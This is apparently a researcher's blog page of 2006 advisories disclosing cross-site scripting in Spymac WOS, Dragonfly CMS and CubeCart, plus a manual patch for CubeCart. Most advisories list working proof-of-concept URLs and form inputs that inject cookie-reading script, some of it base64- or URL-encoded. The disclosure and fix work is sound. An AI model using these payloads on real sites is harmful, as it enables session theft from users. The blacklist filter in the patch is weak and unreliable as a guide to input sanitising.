Multiple Cross site scripting in Spymac WOS V

Wednesday, May 17, 2006
##########################################################
Multiple Cross site scripting in Spymac WOS V
Vendor url: http://www.spymac.com
Advisore:http://lostmon.blogspot.com/2006/05/
multiple-cross-site-scripting-in.html
Vendor notify: yes Exploit available: yes
OSVDB ID:25925,25926,25927,
Securitytracker:1016116
FrSIRT/ADV-2006-1852
##########################################################


Spymac WOS is powered by an integrated collection of Web
and desktop applications that together form "Spymac WOS".
Developed in-house, Spymac WOS is an intelligent environment
featuring patent-pending technology that allows for the creation
of an immersive and visually-stunning Web experience.

Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.


#######################
Versions
#######################

Spymac WOS V


########################
Solution:
########################

No solution was available at this time.


########################
Examples
########################

for view some examples... need a client login.
http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]
http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]
http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]
http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]


http://[VICTIM]/login.php?[XSS-CODE]


some others variables are subsceptibles to the same flaw.



########################
TIMELINE
########################

Discovered:02-05-2006
Vendor notify:14-05-2006
Vendor response:-------------
Disclosure:17-05-2006


######################## €nd #####################

Thnx to Estrella to be my ligth.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Multiple Cross site scripting in dragonflycms

Wednesday, February 22, 2006
######################################################
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################

Description:

"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."

CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.



######################
Versions
######################

prior to Dragonfly 9.0.6.1

#########################
Solution
########################

No solution was available at this time.

##########################
Timeline
##########################

discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006


#############################
XSS in module 'Your_Account'
#############################

http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>

http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh

http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>


http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+


this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.

the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...

#######################
XSS in module 'News'
#######################

http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>

http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>

http://[Victim]/index.php?name=News&file=submit

// texareas 'Story Text' and Extended text are vulnerables.

http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>


#################################
XSS in module 'Stories_Archive'
#################################

http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>

http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11

http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>

###########################
XSS in module 'Web_Links'
###########################

http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>

http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>

http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>

http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>


###########################
XSS in module 'Surveys'
###########################

http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3

http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>

###########################
XSS in module 'Downloads'
###########################

http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>

###########################
XSS in module 'coppermine'
###########################

http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html

http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>

http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>


############################
XSS in module -Search-
############################

http://[Victim]/index.php?name=Search

User input passed to the search box in the following
modules is not sanitised before being returned to users:

Search
Stories_Archive
Downloads
Topics

if we insert in the search box this code "><script>alert()</script>
this is executed wen we click in Search button.

####################### €nd ############################

Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1

Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################

1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################

open includes/functions.inc.php look this code :

arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}
---------------------------------------------------------

if you have a diferen code like this , replace for this...

#########################################
2- index.php param 'act' and 'searchStr'
#########################################

open index.php at line 90 you have this for 'act' param:

------------------------------
if(isset($_GET['act'])){
switch ($_GET['act']) {

-----------------------------------------

you can change for this:

-------------------------------------------

$_GET['act'] = treatGet($_GET['act']);
if(isset($_GET['act'])){
switch ($_GET['act']) {
---------------------------------------------------

open index.php at line 80 you have this for 'searchStr' param

-----------------------------------------------------

if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
-------------------------------------------------------

you can change for this other:

--------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
--------------------------------------------------

#######################################################
3- fix 'catId' param includes/content/viewCat.inc.php
#######################################################

for fix 'catId' param open includes/content/viewCat.inc.php

found this code at line 50:

--------------------------------------------------
if(isset($_GET['catId'])) {

----------------------------------------

change for this other:
-----------------------------------------

$_GET['catId'] = treatGet($_GET['catId']);
if(isset($_GET['catId'])) {

-----------------------------------------

###################################################
4 fix 'productId' param includes/content/viewProd.inc.php
####################################################

at line 38 you have :

--------------------------------------------------

// query database
$query = "SELECT productId, productCode, quantity, name, description, image,

-----------------------------------------------------------------

you can change forr this other

------------------------------------------------------
// query database
$_GET['productId'] = treatGet($_GET['productId']);
$query = "SELECT productId, productCode, quantity, name, description, image,

---------------------------------------------------------------------

##############################################
5- cart.php fix params 'act' and 'searchStr'
##############################################

open cart.php for fix 'act' param look at line you have this code:

-------------------------------------------
// START MAIN CONTENT
switch ($_GET['act']) {
--------------------------------------------

replace for this other:

---------------------------------------------

// START MAIN CONTENT
$_GET['act'] = treatGet($_GET['act']);
switch ($_GET['act']) {
----------------------------------------------

arround line 69 you have :
--------------------------------
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",$_GET['searchStr']);

------------------------------------------

you can change for:

------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
---------------------------------------------

#######################################################
6- fix param 'docId' includes/content/viewDoc.inc.php
#######################################################

insert this line at line 36:
--------------------------------------
$_GET['docId'] = treatGet($_GET['docId']);
------------------------------------------

#######################################################
7- fix 'act' , 'username' ,'password','remember' and
'redir' params in includes/content/login.inc.php
#######################################################

inser this line at line 35:
---------------------------------------------------------

$_GET['act'] = treatGet($_GET['act']); $_POST['username'] = treatGet($_POST['username']);
$_POST['password'] = treatGet($_POST['password']);
-----------------------------------------------------------

for fix 'redir' param look and insert this line after line 52:

---------------------------------------------
//"login","reg","unsubscribe","forgotPass"
$_GET['redir'] = treatGet($_GET['redir']);
-------------------------------------------------------------

for fix 'remember' param inser this code at line 52:

---------------------------------------------

$_POST['remember'] = treatGet($_POST['remember']);

-------------------------------------------------


######################################
8-fix 'productId' and $_POST
includes/content/tellafriend.inc.php
######################################

open includes/content/tellafriend.inc.php

add this line after line 35 for fix 'productId' param :

------------------------------

// query database
$_GET['productId'] = treatGet($_GET['productId']) ;

-------------------------------------------------------

fix XSS in all boxes wen post,
arround line 58 you have this:

$text = sprintf($lang['front']['tellafriend']['email_body'],$_POST['recipName'],stripslashes($_POST['message']),$GLOBALS['storeURL'],$_GET['productId'],$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);



you can change for this other:
----------------------------------------------------

$text = sprintf($lang['front']['tellafriend']['email_body'],treatGet($_POST['recipName']),stripslashes(treatGet($_POST['message'])),$GLOBALS['storeURL'],treatGet($_GET['productId']),$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);

------------------------------------------------------

##########################
9- THANKS
##########################

I want to thank to all those that belive in my.
To OSVDB (http://www.osvdb.org) by its exelente work.
To All Manglers and Moderators of osvdb they belive in this project and they work for it :)))
To Secunia (http://www.secunia.com) by his verificacion and publication and pursuit of my work ,to Securityfocus (http://www.securityfocus.com)
like a all those that you preocupate of which my work is distributed by different means.
thanks to all those that stays there and all those that no longer stays.

CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting

Tuesday, January 10, 2006
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################

I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:

http://www.bindshell.net/papers/xssv.html

CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.

###############
VERSIONS
###############

CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too

#################
Timeline
#################

Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006

###############
Examples:
###############


http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E


http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go

http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat

http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>

#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>

#############
SOLUTION
#############

no solution was available at this time

currently i found a posible fix :

see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html

or

http://bugs.cubecart.com/?do=details&id=459


##################### €nd ########################

Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends